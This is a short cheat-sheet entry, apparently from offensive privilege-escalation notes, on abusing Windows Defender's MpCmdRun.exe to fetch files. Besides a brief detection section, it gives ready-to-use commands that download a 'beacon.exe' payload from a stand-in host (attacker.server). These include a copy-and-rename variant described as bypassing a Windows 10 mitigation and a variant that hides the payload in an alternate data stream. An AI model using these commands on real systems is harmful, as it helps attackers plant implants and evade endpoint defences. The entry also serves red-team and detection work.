~/Privilege Escalation/Windows/Binaries# cat MpCmdRun.exe.md █
Binary part of Windows Defender. Used to manage settings in Windows Defender
Paths:
C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.4-0\MpCmdRun.exe
C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.7-0\MpCmdRun.exe
C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe
Detection: MpCmdRun storing data into alternate data streams. MpCmdRun getting a file from a remote machine or the internet that is not expected. Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching mpcmdrun.exe. Monitor for the creation of %USERPROFILE%\AppData\Local\Temp\MpCmdRun.log User Agent is “MpCommunication”
Download
Download file to specified path - Slashes work as well as dashes (/DownloadFile, /url, /path)
MpCmdRun.exe -DownloadFile -url https://attacker.server/beacon.exe -path c:\\temp\\beacon.exe
Download file to specified path - Slashes work as well as dashes (/DownloadFile, /url, /path) [updated version to bypass Windows 10 mitigation]
copy "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe" C:\Users\Public\Downloads\MP.exe && chdir "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\" && "C:\Users\Public\Downloads\MP.exe" -DownloadFile -url https://attacker.server/beacon.exe -path C:\Users\Public\Downloads\evil.exe
Alternate data streams
Download file to machine and store it in Alternate Data Stream
MpCmdRun.exe -DownloadFile -url https://attacker.server/beacon.exe -path c:\\temp\\nicefile.txt:evil.exe